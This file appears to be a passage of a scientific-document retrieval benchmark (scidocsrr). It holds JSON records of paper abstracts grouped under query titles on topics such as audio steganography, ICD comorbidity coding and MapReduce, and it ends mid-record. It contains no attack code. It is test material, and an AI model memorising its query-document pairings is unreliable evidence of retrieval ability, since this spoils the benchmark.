"text": "Common bean (Phaseolus vulgaris) is grown throughout the world and comprises roughly 50% of the grain legumes consumed worldwide. Despite this, genetic resources for common beans have been lacking. Next generation sequencing, has facilitated our investigation of the gene expression profiles associated with biologically important traits in common bean. An increased understanding of gene expression in common bean will improve our understanding of gene expression patterns in other legume species. Combining recently developed genomic resources for Phaseolus vulgaris, including predicted gene calls, with RNA-Seq technology, we measured the gene expression patterns from 24 samples collected from seven tissues at developmentally important stages and from three nitrogen treatments. Gene expression patterns throughout the plant were analyzed to better understand changes due to nodulation, seed development, and nitrogen utilization. We have identified 11,010 genes differentially expressed with a fold change ≥ 2 and a P-value < 0.05 between different tissues at the same time point, 15,752 genes differentially expressed within a tissue due to changes in development, and 2,315 genes expressed only in a single tissue. These analyses identified 2,970 genes with expression patterns that appear to be directly dependent on the source of available nitrogen. Finally, we have assembled this data in a publicly available database, The Phaseolus vulgaris Gene Expression Atlas (Pv GEA), http://plantgrn.noble.org/PvGEA/ . Using the website, researchers can query gene expression profiles of their gene of interest, search for genes expressed in different tissues, or download the dataset in a tabular form. These data provide the basis for a gene expression atlas, which will facilitate functional genomic studies in common bean. Analysis of this dataset has identified genes important in regulating seed composition and has increased our understanding of nodulation and impact of the nitrogen source on assimilation and distribution throughout the plant.",
"title": ""
},
{
"docid": "cbd0266068778d476d98ad2c20d9e64c",
"text": "Obesity treatment requires obese patients to record all food intakes per day. Computer vision has been applied to estimate calories from food images. In order to increase detection accuracy and reduce the error of volume estimation in food calorie estimation, we present our calorie estimation method in this paper. To estimate calorie of food, a top view and side view are needed. Faster R-CNN is used to detect each food and calibration object. GrabCut algorithm is used to get each food’s contour. Then each food’s volume is estimated by volume estimation formulas. Finally we estimate each food’s calorie. And the experiment results show our estimation method is effective.",
"title": ""
},
{
"docid": "00bda5bd75c6c102cab3094f699123d8",
"text": "This paper investigates the application of causal inference methodology for observational studies to software fault localization based on test outcomes and profiles. This methodology combines statistical techniques for counterfactual inference with causal graphical models to obtain causal-effect estimates that are not subject to severe confounding bias. The methodology applies Pearl's Back-Door Criterion to program dependence graphs to justify a linear model for estimating the causal effect of covering a given statement on the occurrence of failures. The paper also presents the analysis of several proposed-fault localization metrics and their relationships to our causal estimator. Finally, the paper presents empirical results demonstrating that our model significantly improves the effectiveness of fault localization.",
"title": ""
}
] | scidocsrr |
3e7cdacd008d665f46ac4360683472fc | Hiding Text In Audio Using Multiple LSB Steganography And Provide Security Using Cryptography | [
{
"docid": "173fad08a1115cd95160590038be97c1",
"text": "We consider the problem of embedding one signal (e.g., a digital watermark), within another “host” signal to form a third, “composite” signal. The embedding is designed to achieve efficient trade-offs among the three conflicting goals of maximizing information-embedding rate, minimizing distortion between the host signal and composite signal, and maximizing the robustness of the embedding. We introduce new classes of embedding methods, termed quantization index modulation (QIM) and distortion-compensated QIM (DC-QIM), and develop convenient realizations in the form of what we refer to as dither modulation. Using deterministic models to evaluate digital watermarking methods, we show that QIM is “provably good” against arbitrary bounded and fully-informed attacks, which arise in several copyright applications, and in particular it achieves provably better rate-distortion-robustness trade-offs than currently popular spread-spectrum and low-bit(s) modulation methods. Furthermore, we show that for some important classes of probabilistic models, DC-QIM is optimal (capacity-achieving) and regular QIM is near-optimal. These include both additive white Gaussian noise channels, which may be good models for hybrid transmission applications such as digital audio broadcasting, and mean-square-error constrained attack channels that model private-key watermarking applications.",
"title": ""
}
] | [
{
"docid": "6bab9326dd38f25794525dc852ece818",
"text": "The transformation from high level task speci cation to low level motion control is a fundamental issue in sensorimotor control in animals and robots. This thesis develops a control scheme called virtual model control which addresses this issue. Virtual model control is a motion control language which uses simulations of imagined mechanical components to create forces, which are applied through joint torques, thereby creating the illusion that the components are connected to the robot. Due to the intuitive nature of this technique, designing a virtual model controller requires the same skills as designing the mechanism itself. A high level control system can be cascaded with the low level virtual model controller to modulate the parameters of the virtual mechanisms. Discrete commands from the high level controller would then result in uid motion. An extension of Gardner's Partitioned Actuator Set Control method is developed. This method allows for the speci cation of constraints on the generalized forces which each serial path of a parallel mechanism can apply. Virtual model control has been applied to a bipedal walking robot. A simple algorithm utilizing a simple set of virtual components has successfully compelled the robot to walk eight consecutive steps. Thesis Supervisor: Gill A. Pratt Title: Assistant Professor of Electrical Engineering and Computer Science",
"title": ""
},
{
"docid": "fe84336ba986e730aec1b2795a06bfe6",
"text": "A fundamental task in data analysis is understanding the differences between several contrasting groups. These groups can represent different classes of objects, such as male or female students, or the same group over time, e.g. freshman students in 1993 versus 1998. We present the problem of mining contrast-sets: conjunctions of attributes and values that differ meaningfully in their distribution across groups. We provide an algorithm for mining contrast-sets as well as several pruning rules to reduce the computational complexity. Once the deviations are found, we post-process the results to present a subset that are surprising to the user given what we have already shown. We explicitly control the probability of Type I error (false positives) and guarantee a maximum error rate for the entire analysis by using Bonferroni corrections.",
"title": ""
},
{
"docid": "8b00d5d458e251ef0f033d00ff03c838",
"text": "Daily behavioral rhythms in mammals are governed by the central circadian clock, located in the suprachiasmatic nucleus (SCN). The behavioral rhythms persist even in constant darkness, with a stable activity time due to coupling between two oscillators that determine the morning and evening activities. Accumulating evidence supports a prerequisite role for Ca(2+) in the robust oscillation of the SCN, yet the underlying molecular mechanism remains elusive. Here, we show that Ca(2+)/calmodulin-dependent protein kinase II (CaMKII) activity is essential for not only the cellular oscillation but also synchronization among oscillators in the SCN. A kinase-dead mutation in mouse CaMKIIα weakened the behavioral rhythmicity and elicited decoupling between the morning and evening activity rhythms, sometimes causing arrhythmicity. In the mutant SCN, the right and left nuclei showed uncoupled oscillations. Cellular and biochemical analyses revealed that Ca(2+)-calmodulin-CaMKII signaling contributes to activation of E-box-dependent gene expression through promoting dimerization of circadian locomotor output cycles kaput (CLOCK) and brain and muscle Arnt-like protein 1 (BMAL1). These results demonstrate a dual role of CaMKII as a component of cell-autonomous clockwork and as a synchronizer integrating circadian behavioral activities.",
"title": ""
},
{
"docid": "02a130ee46349366f2df347119831e5c",
"text": "Low power ad hoc wireless networks operate in conditions where channels are subject to fading. Cooperative diversity mitigates fading in these networks by establishing virtual antenna arrays through clustering the nodes. A cluster in a cooperative diversity network is a collection of nodes that cooperatively transmits a single packet. There are two types of clustering schemes: static and dynamic. In static clustering all nodes start and stop transmission simultaneously, and nodes do not join or leave the cluster while the packet is being transmitted. Dynamic clustering allows a node to join an ongoing cooperative transmission of a packet as soon as the packet is received. In this paper we take a broad view of the cooperative network by examining packet flows, while still faithfully implementing the physical layer at the bit level. We evaluate both clustering schemes using simulations on large multi-flow networks. We demonstrate that dynamically-clustered cooperative networks substantially outperform both statically-clustered cooperative networks and classical point-to-point networks.",
"title": ""
},
{
"docid": "1ecf01e0c9aec4159312406368ceeff0",
"text": "Image phylogeny is the problem of reconstructing the structure that represents the history of generation of semantically similar images (e.g., near-duplicate images). Typical image phylogeny approaches break the problem into two steps: (1) estimating the dissimilarity between each pair of images and (2) reconstructing the phylogeny structure. Given that the dissimilarity calculation directly impacts the phylogeny reconstruction, in this paper, we propose new approaches to the standard formulation of the dissimilarity measure employed in image phylogeny, aiming at improving the reconstruction of the tree structure that represents the generational relationships between semantically similar images. These new formulations exploit a different method of color adjustment, local gradients to estimate pixel differences and mutual information as a similarity measure. The results obtained with the proposed formulation remarkably outperform the existing counterparts in the literature, allowing a much better analysis of the kinship relationships in a set of images, allowing for more accurate deployment of phylogeny solutions to tackle traitor tracing, copyright enforcement and digital forensics problems.",
"title": ""
},
{
"docid": "b40a6bceb64524aa28cdd668d5dd5900",
"text": "For computer vision applications, prior works have shown the efficacy of reducing numeric precision of model parameters (network weights) in deep neural networks. Activation maps, however, occupy a large memory footprint during both the training and inference step when using mini-batches of inputs. One way to reduce this large memory footprint is to reduce the precision of activations. However, past works have shown that reducing the precision of activations hurts model accuracy. We study schemes to train networks from scratch using reduced-precision activations without hurting accuracy. We reduce the precision of activation maps (along with model parameters) and increase the number of filter maps in a layer, and find that this scheme matches or surpasses the accuracy of the baseline full-precision network. As a result, one can significantly improve the execution efficiency (e.g. reduce dynamic memory footprint, memory bandwidth and computational energy) and speed up the training and inference process with appropriate hardware support. We call our scheme WRPN wide reduced-precision networks. We report results and show that WRPN scheme is better than previously reported accuracies on ILSVRC-12 dataset while being computationally less expensive compared to previously reported reduced-precision networks.",
"title": ""
},
{
"docid": "6ce28e4fe8724f685453a019f253b252",
"text": "This paper is focused on receivables management and possibilities how to use available information technologies. The use of information technologies should make receivables management easier on one hand and on the other hand it makes the processes more efficient. Finally it decreases additional costs and losses connected with enforcing receivables when defaulting debts occur. The situation of use of information technologies is different if the subject is financial or nonfinancial institution. In the case of financial institution loans providing is core business and the processes and their technical support are more sophisticated than in the case of non-financial institutions whose loan providing as invoices is just a supplement to their core business activities. The paper shows use of information technologies in individual cases but it also emphasizes the use of general results for further decision making process. Results of receivables management are illustrated on the data of the Czech Republic.",
"title": ""
},
{
"docid": "20ba291aa2ed002f3fd8b0ccc632382e",
"text": "Estimating stock market trends is very important for investors to act for future. Kingdom of Saudi Arabia (KSA) stock market is evolving rapidly; so the objective of this paper is to forecast the stock market trends using logistic model and artificial neural network. Logistic model is a variety of probabilistic statistical classification model. It is also used to predict a binary response from a binary predictor. Artificial neural networks are used for forecasting because of their capabilities of pattern recognition and machine learning. Both methods are used to forecast the stock prices of upcoming period. The model has used the preprocessed data set of closing value of TASA Index. The data set encompassed the trading days from 5 April, 2007 to 1 January, 2015. With logistic regression it may be observed that four variables i.e. open price, higher price, lower price and oil can classify up to 81.55% into two categories up and down. While with neural networks The prediction accuracy of the model is high both for the training data (84.12%) and test data (81.84%).",
"title": ""
},
{
"docid": "6e1e3209c127eca9c2e3de76d745d215",
"text": "Recently, in 2014, He and Wang proposed a robust and efficient multi-server authentication scheme using biometrics-based smart card and elliptic curve cryptography (ECC). In this paper, we first analyze He-Wang's scheme and show that their scheme is vulnerable to a known session-specific temporary information attack and impersonation attack. In addition, we show that their scheme does not provide strong user's anonymity. Furthermore, He-Wang's scheme cannot provide the user revocation facility when the smart card is lost/stolen or user's authentication parameter is revealed. Apart from these, He-Wang's scheme has some design flaws, such as wrong password login and its consequences, and wrong password update during password change phase. We then propose a new secure multi-server authentication protocol using biometric-based smart card and ECC with more security functionalities. Using the Burrows-Abadi-Needham logic, we show that our scheme provides secure authentication. In addition, we simulate our scheme for the formal security verification using the widely accepted and used automated validation of Internet security protocols and applications tool, and show that our scheme is secure against passive and active attacks. Our scheme provides high security along with low communication cost, computational cost, and variety of security features. As a result, our scheme is very suitable for battery-limited mobile devices as compared with He-Wang's scheme.",
"title": ""
},
{
"docid": "020781cec754310dac5b281d7f84bbf5",
"text": "Quantitative data cleaning relies on the use of statistical methods to identify and repair data quality problems while logical data cleaning tackles the same problems using various forms of logical reasoning over declarative dependencies. Each of these approaches has its strengths: the logical approach is able to capture subtle data quality problems using sophisticated dependencies, while the quantitative approach excels at ensuring that the repaired data has desired statistical properties. We propose a novel framework within which these two approaches can be used synergistically to combine their respective strengths. We instantiate our framework using (i) metric functional dependencies (metric FDs), a type of dependency that generalizes the commonly used FDs to identify inconsistencies in domains where only large differences in metric data are considered to be a data quality problem, and (ii) repairs that modify the inconsistent data so as to minimize statistical distortion, measured using the Earth Mover’s Distance (EMD). We show that the problem of computing a statistical distortion minimal repair is NP-hard. Given this complexity, we present an efficient algorithm for finding a minimal repair that has a small statistical distortion using EMD computation over semantically related attributes. To identify semantically related attributes, we present a sound and complete axiomatization and an efficient algorithm for testing implication of metric FDs. While the complexity of inference for some other FD extensions is co-NP complete, we show that the inference problem for metric FDs remains linear, as in traditional FDs. We prove that every instance that can be generated by our repair algorithm is set minimal (with no redundant changes). Our experimental evaluation demonstrates that our techniques obtain a considerably lower statistical distortion than existing repair techniques, while achieving similar levels of efficiency. ∗Supported by NSERC BIN (and Szlichta by MITACS).",
"title": ""
},
{
"docid": "602a583f90a17e138c6cfeccbb34fdeb",
"text": "This paper presents a method for adding multiple tasks to a single deep neural network while avoiding catastrophic forgetting. Inspired by network pruning techniques, we exploit redundancies in large deep networks to free up parameters that can then be employed to learn new tasks. By performing iterative pruning and network re-training, we are able to sequentially \"pack\" multiple tasks into a single network while ensuring minimal drop in performance and minimal storage overhead. Unlike prior work that uses proxy losses to maintain accuracy on older tasks, we always optimize for the task at hand. We perform extensive experiments on a variety of network architectures and large-scale datasets, and observe much better robustness against catastrophic forgetting than prior work. In particular, we are able to add three fine-grained classification tasks to a single ImageNet-trained VGG-16 network and achieve accuracies close to those of separately trained networks for each task.",
"title": ""
},
{
"docid": "9d0b7f84d0d326694121a8ba7a3094b4",
"text": "Passive sensing of human hand and limb motion is important for a wide range of applications from human-computer interaction to athletic performance measurement. High degree of freedom articulated mechanisms like the human hand are di cult to track because of their large state space and complex image appearance. This article describes a model-based hand tracking system, called DigitEyes, that can recover the state of a 27 DOF hand model from ordinary gray scale images at speeds of up to 10 Hz.",
"title": ""
},
{
"docid": "013b0ae55c64f322d61e1bf7e8d4c55a",
"text": "Binary neural networks for object recognition are desirable especially for small and embedded systems because of their arithmetic and memory efficiency coming from the restriction of the bit-depth of network weights and activations. Neural networks in general have a tradeoff between the accuracy and efficiency in choosing a model architecture, and this tradeoff matters more for binary networks because of the limited bit-depth. This paper then examines the performance of binary networks by modifying architecture parameters (depth and width parameters) and reports the best-performing settings for specific datasets. These findings will be useful for designing binary networks for practical uses.",
"title": ""
},
{
"docid": "e8bdec1a8f28631e0a61d9d1b74e4e05",
"text": "As a kernel function in network routers, packet classification requires the incoming packet headers to be checked against a set of predefined rules. There are two trends for packet classification: (1) to examine a large number of packet header fields, and (2) to use software-based solutions on multi-core general purpose processors and virtual machines. Although packet classification has been widely studied, most existing solutions on multi-core systems target the classic 5-field packet classification; it is not easy to scale up their performance with respect to the number of packet header fields. In this work, we present a decomposition-based packet classification approach; it supports large rule sets consisting of a large number of packet header fields. In our approach, range-tree and hashing are used to search the fields of the input packet header in parallel. The partial results from all the fields are represented in rule ID sets; they are merged efficiently to produce the final match result. We implement our approach and evaluate its performance with respect to overall throughput and processing latency for rule set size varying from 1 to 32 K. Experimental results on state-of-the-art 16-core platforms show that, an overall throughput of 48 million packets per second and a processing latency of 2,000 ns per packet can be achieved for a 32 K rule set.",
"title": ""
},
{
"docid": "aac39295e7e884237c5b929c32b3c050",
"text": "Leveraging the most recent success in expanding the electrochemical stability window of aqueous electrolytes, in this work we create a unique Li-ion/sulfur chemistry of both high energy density and safety. We show that in the superconcentrated aqueous electrolyte, lithiation of sulfur experiences phase change from a high-order polysulfide to low-order polysulfides through solid-liquid two-phase reaction pathway, where the liquid polysulfide phase in the sulfide electrode is thermodynamically phase-separated from the superconcentrated aqueous electrolyte. The sulfur with solid-liquid two-phase exhibits a reversible capacity of 1,327 mAh/(g of S), along with fast reaction kinetics and negligible polysulfide dissolution. By coupling a sulfur anode with different Li-ion cathode materials, the aqueous Li-ion/sulfur full cell delivers record-high energy densities up to 200 Wh/(kg of total electrode mass) for >1,000 cycles at ∼100% coulombic efficiency. These performances already approach that of commercial lithium-ion batteries (LIBs) using a nonaqueous electrolyte, along with intrinsic safety not possessed by the latter. The excellent performance of this aqueous battery chemistry significantly promotes the practical possibility of aqueous LIBs in large-format applications.",
"title": ""
},
{
"docid": "acbac38a7de49bf1b6ad15abb007b601",
"text": "Our everyday environments are gradually becoming intelligent, facilitated both by technological development and user activities. Although large-scale intelligent environments are still rare in actual everyday use, they have been studied for quite a long time, and several user studies have been carried out. In this paper, we present a user-centric view of intelligent environments based on published research results and our own experiences from user studies with concepts and prototypes. We analyze user acceptance and users’ expectations that affect users’ willingness to start using intelligent environments and to continue using them. We discuss user experience of interacting with intelligent environments where physical and virtual elements are intertwined. Finally, we touch on the role of users in shaping their own intelligent environments instead of just using ready-made environments. People are not merely “using” the intelligent environments but they live in them, and they experience the environments via embedded services and new interaction tools as well as the physical and social environment. Intelligent environments should provide emotional as well as instrumental value to the people who live in them, and the environments should be trustworthy and controllable both by regular users and occasional visitors. Understanding user expectations and user experience in intelligent environments, OPEN ACCESS",
"title": ""
},
{
"docid": "6f2720e4f63b5d3902810ee5b2c17f2b",
"text": "Latent structured prediction theory proposes powerful methods such as Latent Structural SVM (LSSVM), which can potentially be very appealing for coreference resolution (CR). In contrast, only small work is available, mainly targeting the latent structured perceptron (LSP). In this paper, we carried out a practical study comparing for the first time online learning with LSSVM. We analyze the intricacies that may have made initial attempts to use LSSVM fail, i.e., a huge training time and much lower accuracy produced by Kruskal’s spanning tree algorithm. In this respect, we also propose a new effective feature selection approach for improving system efficiency. The results show that LSP, if correctly parameterized, produces the same performance as LSSVM, being at the same time much more efficient.",
"title": ""
},
{
"docid": "f1b1c895ada4aec47fbf5c5618b1791a",
"text": "We report three sibs born to a third degree consanguineous Indian family affected with Bartsocas Papas Syndrome. All the three pregnancies were complicated by severe oligohydramnios, which is not commonly seen with Bartsocas-Papas syndrome.",
"title": ""
},
{
"docid": "60cac74e5feffb45f3b926ce2ec8b0b9",
"text": "Battery power is an important resource in ad hoc networks. It has been observed that in ad hoc networks, energy consumption does not reflect the communication activities in the network. Many existing energy conservation protocols based on electing a routing backbone for global connectivity are oblivious to traffic characteristics. In this paper, we propose an extensible on-demand power management framework for ad hoc networks that adapts to traffic load. Nodes maintain soft-state timers that determine power management transitions. By monitoring routing control messages and data transmission, these timers are set and refreshed on-demand. Nodes that are not involved in data delivery may go to sleep as supported by the MAC protocol. This soft state is aggregated across multiple flows and its maintenance requires no additional out-of-band messages. We implement a prototype of our framework in the ns-2 simulator that uses the IEEE 802.11 MAC protocol. Simulation studies using our scheme with the Dynamic Source Routing protocol show a reduction in energy consumption near 50% when compared to a network without power management under both long-lived CBR traffic and on-off traffic loads, with comparable throughput and latency. Preliminary results also show that it outperforms existing routing backbone election approaches.",
"title": ""
},
{
"docid": "eb99e0c5e9682cf2665a2e495ca3502a",
"text": "Recently introduced 3D vertical flash memory is expected to be a disruptive technology since it overcomes scaling challenges of conventional 2D planar flash memory by stacking up cells in the vertical direction. However, 3D vertical flash memory suffers from a new problem known as fast detrapping, which is a rapid charge loss problem. In this paper, we propose a scheme to compensate the effect of fast detrapping by intentional inter-cell interference (ICI). In order to properly control the intentional ICI, our scheme relies on a coding technique that incorporates the side information of fast detrapping during the encoding stage. This technique is closely connected to the well-known problem of coding in a memory with defective cells. Numerical results show that the proposed scheme can effectively address the problem of fast detrapping.",
"title": ""
}
] | scidocsrr |
bbd34290c80347963ed7ad6a23acba13 | Coding algorithms for defining comorbidities in ICD-9-CM and ICD-10 administrative data. | [
{
"docid": "b1746ab2946c51bcd10360d051da351f",
"text": "BACKGROUND AND OBJECTIVE\nThe ICD-9-CM adaptation of the Charlson comorbidity score has been a valuable resource for health services researchers. With the transition into ICD-10 coding worldwide, an ICD-10 version of the Deyo adaptation was developed and validated using population-based hospital data from Victoria, Australia.\n\n\nMETHODS\nThe algorithm was translated from ICD-9-CM into ICD-10-AM (Australian modification) in a multistep process. After a mapping algorithm was used to develop an initial translation, these codes were manually examined by the coding experts and a general physician for face validity. Because the ICD-10 system is country specific, our goal was to keep many of the translated code at the three-digit level for generalizability of the new index.\n\n\nRESULTS\nThere appears to be little difference in the distribution of the Charlson Index score between the two versions. A strong association between increasing index scores and mortality exists: the area under the ROC curve is 0.865 for the last year using the ICD-9-CM version and remains high, at 0.855, for the ICD-10 version.\n\n\nCONCLUSION\nThis work represents the first rigorous adaptation of the Charlson comorbidity index for use with ICD-10 data. In comparison with a well-established ICD-9-CM coding algorithm, it yields closely similar prevalence and prognosis information by comorbidity category.",
"title": ""
}
] | [
{
"docid": "40e064fb1e9067cb2302baf73ce1548e",
"text": "Selecting the most appropriate research method is one of the most difficult problems facing a doctoral researcher. Grounded Theory is presented here as a method of choice as it is detailed, rigorous, and systematic, yet it also permits flexibility and freedom. Grounded Theory offers many benefits to research in Information Systems as it is suitable for the investigation of complex multifaceted phenomena. It is also well equipped to explore socially related issues. Despite existing criticism, it is a rigorous and methodical research approach capable of broadening the perceptions of those in the research community. This paper provides detailed and practical guidelines that illustrate the techniques, utility, and ease of use of grounded theory, especially as these apply to information systems based research. This paper tracks a Grounded Theory research project undertaken to study the phenomena of collaboration and knowledge sharing in the Australian Film Industry. It uses this to illustrate and emphasize salient points to assist potential users in applying the method. The very practical approach shared in this paper provides a focused critique rendering it a valuable contribution to the discussion of methods of analysis in the IS sphere, particularly grounded theory.",
"title": ""
},
{
"docid": "5cf757aab033db7ccd52cf23e2be32b3",
"text": "This paper presents investigation on speech recognition classification performance when using different standard neural networks structures as a classifier. Those cases include usage of a Feed-forward Neural Network (NN) with back propagation algorithm and a Radial Basis Functions (RBF) Neural Network.",
"title": ""
},
{
"docid": "780f2a97da4f18fc3710fa0ca0489ef4",
"text": "MapReduce has gradually become the framework of choice for \"big data\". The MapReduce model allows for efficient and swift processing of large scale data with a cluster of compute nodes. However, the efficiency here comes at a price. The performance of widely used MapReduce implementations such as Hadoop suffers in heterogeneous and load-imbalanced clusters. We show the disparity in performance between homogeneous and heterogeneous clusters in this paper to be high. Subsequently, we present MARLA, a MapReduce framework capable of performing well not only in homogeneous settings, but also when the cluster exhibits heterogeneous properties. We address the problems associated with existing MapReduce implementations affecting cluster heterogeneity, and subsequently present through MARLA the components and trade-offs necessary for better MapReduce performance in heterogeneous cluster and cloud environments. We quantify the performance gains exhibited by our approach against Apache Hadoop and MARIANE in data intensive and compute intensive applications.",
"title": ""
},
{
"docid": "07657456a2328be11dfaf706b5728ddc",
"text": "Knowledge of wheelchair kinematics during a match is prerequisite for performance improvement in wheelchair basketball. Unfortunately, no measurement system providing key kinematic outcomes proved to be reliable in competition. In this study, the reliability of estimated wheelchair kinematics based on a three inertial measurement unit (IMU) configuration was assessed in wheelchair basketball match-like conditions. Twenty participants performed a series of tests reflecting different motion aspects of wheelchair basketball. During the tests wheelchair kinematics were simultaneously measured using IMUs on wheels and frame, and a 24-camera optical motion analysis system serving as gold standard. Results showed only small deviations of the IMU method compared to the gold standard, once a newly developed skid correction algorithm was applied. Calculated Root Mean Square Errors (RMSE) showed good estimates for frame displacement (RMSE≤0.05 m) and speed (RMSE≤0.1m/s), except for three truly vigorous tests. Estimates of frame rotation in the horizontal plane (RMSE<3°) and rotational speed (RMSE<7°/s) were very accurate. Differences in calculated Instantaneous Rotation Centres (IRC) were small, but somewhat larger in tests performed at high speed (RMSE up to 0.19 m). Average test outcomes for linear speed (ICCs>0.90), rotational speed (ICC>0.99) and IRC (ICC> 0.90) showed high correlations between IMU data and gold standard. IMU based estimation of wheelchair kinematics provided reliable results, except for brief moments of wheel skidding in truly vigorous tests. The IMU method is believed to enable prospective research in wheelchair basketball match conditions and contribute to individual support of athletes in everyday sports practice.",
"title": ""
},
{
"docid": "4160267cb2de92621edb5634a3bb985e",
"text": "This paper reports the results of a study carried out to assess the benefits, impediments and major critical success factors in adopting business to consumer e-business solutions. A case study method of investigation was used, and the experiences of six online companies and two bricks and mortar companies were documented. The major impediments identified are: leadership issues, operational issues, technology, and ineffective solution design. The critical success factors in the adoption of e-business are identified as: combining e-business knowledge, value proposition and delivery measurement, customer satisfaction and retention, monitoring internal processes and competitor activity, and finally building trust. Findings suggest that above all, adoption of e-business should be appropriate, relevant, value adding, and operationally as well as strategically viable for an organization instead of being a result of apprehensive compliance. q 2004 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "be90932dfddcf02b33fc2ef573b8c910",
"text": "Style-based Text Categorization: What Newspaper Am I Reading?",
"title": ""
},
{
"docid": "5c50099c8a4e638736f430e3b5622b1d",
"text": "BACKGROUND\nAccording to the existential philosophers, meaning, purpose and choice are necessary for quality of life. Qualitative researchers exploring the perspectives of people who have experienced health crises have also identified the need for meaning, purpose and choice following life disruptions. Although espousing the importance of meaning in occupation, occupational therapy theory has been primarily preoccupied with purposeful occupations and thus appears inadequate to address issues of meaning within people's lives.\n\n\nPURPOSE\nThis paper proposes that the fundamental orientation of occupational therapy should be the contributions that occupation makes to meaning in people's lives, furthering the suggestion that occupation might be viewed as comprising dimensions of meaning: doing, being, belonging and becoming. Drawing upon perspectives and research from philosophers, social scientists and occupational therapists, this paper will argue for a renewed understanding of occupation in terms of dimensions of meaning rather than as divisible activities of self-care, productivity and leisure.\n\n\nPRACTICE IMPLICATIONS\nFocusing on meaningful, rather than purposeful occupations more closely aligns the profession with its espoused aspiration to enable the enhancement of quality of life.",
"title": ""
},
{
"docid": "a56166eefea29633c1567212229b5dc9",
"text": "This paper suggests a routing method for automated guided vehicles in port terminals that uses the Q-learning technique. One of the most important issues for the efficient operation of an automated guided vehicle system is to find shortest routes for the vehicles. In this paper, we determine shortest-time routes inclusive of the expected waiting times instead of simple shortest-distance routes, which are usually used in practice. For the determination of the total travel time, the waiting time must be estimated accurately. This study proposes a method for estimating for each vehicle the waiting time that results from the interferences among vehicles during travelling. The estimation of the waiting times is achieved by using the Q-learning technique and by constructing the shortesttime routing matrix for each given set of positions of quay cranes. An experiment was performed to evaluate the performance of the learning algorithm and to compare the performance of the learning-based routes with that of the shortest-distance routes by a simulation study.",
"title": ""
},
{
"docid": "b2261ae40cb837da9aca69916590a7b2",
"text": "Since many languages originated from a common ancestral language and influence each other, there would inevitably exist similarities between these languages such as lexical similarity and named entity similarity. In this paper, we leverage these similarities to improve the translation performance in neural machine translation. Specifically, we introduce an attention-via-attention mechanism that allows the information of source-side characters flowing to the target side directly. With this mechanism, the target-side characters will be generated based on the representation of source-side characters when the words are similar. For instance, our proposed neural machine translation system learns to transfer the characterlevel information of the English word ‘system’ through the attention-via-attention mechanism to generate the Czech word ‘systém’. Consequently, our approach is able to not only achieve a competitive translation performance, but also reduce the model size significantly.",
"title": ""
},
{
"docid": "1afc1c806f41e93d40d362f81be87b5d",
"text": "Forward thinking organizations recognize that data management solutions on their own are becoming very expensive and failing cope with reality. They need to solve the data problem in a different way, through the implementation of an effective Data Governance. Data Governance needs to take a policy-centric approach to data models, data quality standards, data security and lifecycle management, and processes for defining, implementing and enforcing these policies. Until recently, data governance has largely been informal, in siloes around specific enterprise repositories, lacking structure and the wider support of the organization. In many government departments, data governance exists as a set of very ambiguous and generic regulations. The area of data governance is still under-researched, despite its importance. With the emergence of Cloud computing, and its increased adoption by businesses, public organisations and governments, as much as the potential gains from adopting the technology, businesses face new and more complex challenges. Such emphasize the need for effective data governance strategy and programs, which can ensure best returns for cloud adoption. This paper is one of very few published research, which tackles this subject domain, and attempts to lay its foundations.",
"title": ""
},
{
"docid": "b9f01e4f6136b3e02e637dcf5e0f14c9",
"text": "Recent theoretical advances have enabled the use of special monotonic aggregates in recursion. These special aggregates make possible the concise expression and efficient implementation of a rich new set of advanced applications. Among these applications, graph queries are particularly important because of their pervasiveness in data intensive application areas. In this demonstration, we present our Deductive Application Language (DeAL) System, the first of a new generation of Deductive Database Systems that support applications that could not be expressed using regular stratification, or could be expressed using XY-stratification (also supported in DeAL) but suffer from inefficient execution. Using example queries, we will (i) show how complex graph queries can be concisely expressed using DeAL and (ii) illustrate the formal semantics and efficient implementation of these powerful new monotonic constructs.",
"title": ""
},
{
"docid": "6ad344c7049abad62cd53dacc694c651",
"text": "Primary syphilis with oropharyngeal manifestations should be kept in mind, though. Lips and tongue ulcers are the most frequently reported lesions and tonsillar ulcers are much more rare. We report the case of a 24-year-old woman with a syphilitic ulcer localized in her left tonsil.",
"title": ""
},
{
"docid": "f70f4704b23733e6f837fd4e9343be88",
"text": "222 Abstract— This paper investigates the effectiveness of OFDM and proven in other conventional (narrowband) commercial radio technologies (e.g. DS-CDMA in cell phones) (e.g. OFDM in IEEE 802.11a/g).. The main aim was to assess the suitability of OFDM as a modulation technique for a fixed wireless phone system for rural areas. However, its suitability for more general wireless applications is also assessed. Most third generation mobile phone systems are proposing to use Code Division Multiple Access (CDMA) as their modulation technique. For this reason, CDMA is also investigated so that the performance of CDMA could be compared with OFDM on the basis of various wireless parameters. At the end it is concluded that the good features of both the modulation schemes can be combined in an intelligent way to get the best modulation scheme as a solution for wireless communication high speed requirement, channel problems and increased number of users.",
"title": ""
},
{
"docid": "e56efa06a1af42ab3c14754ea70e1f1d",
"text": "The wide diffusion of mobile devices has motivated research towards optimizing energy consumption of software systems— including apps—targeting such devices. Besides efforts aimed at dealing with various kinds of energy bugs, the adoption of Organic Light-Emitting Diode (OLED) screens has motivated research towards reducing energy consumption by choosing an appropriate color palette. Whilst past research in this area aimed at optimizing energy while keeping an acceptable level of contrast, this paper proposes an approach, named GEMMA (Gui Energy Multi-objective optiMization for Android apps), for generating color palettes using a multi- objective optimization technique, which produces color solutions optimizing energy consumption and contrast while using consistent colors with respect to the original color palette. An empirical evaluation that we performed on 25 Android apps demonstrates not only significant improvements in terms of the three different objectives, but also confirmed that in most cases users still perceived the choices of colors as attractive. Finally, for several apps we interviewed the original developers, who in some cases expressed the intent to adopt the proposed choice of color palette, whereas in other cases pointed out directions for future improvements",
"title": ""
},
{
"docid": "bd3feae3ff8f8546efc1290e325b5a4e",
"text": "A bond pad failure mechanism of galvanic corrosion was studied. Analysis results showed that over-etch process, EKC and DI water over cleaning revealed more pitting with Cu seed due to galvanic corrosion. To control and eliminate galvanic corrosion, the etch recipe was optimized and etch time was reduced about 15% to prevent damaging the native oxide. EKC cleaning time was remaining unchanged in order to maintain bond pad F level at minimum level. In this study, the PRS process was also optimized and CF4 gas ratio was reduced about 45%. Moreover, 02 process was added after PRS process so as to increase the native oxide layer on Al bondpads to prevent galvanic corrosion.",
"title": ""
},
{
"docid": "35830166ddf17086a61ab07ec41be6b0",
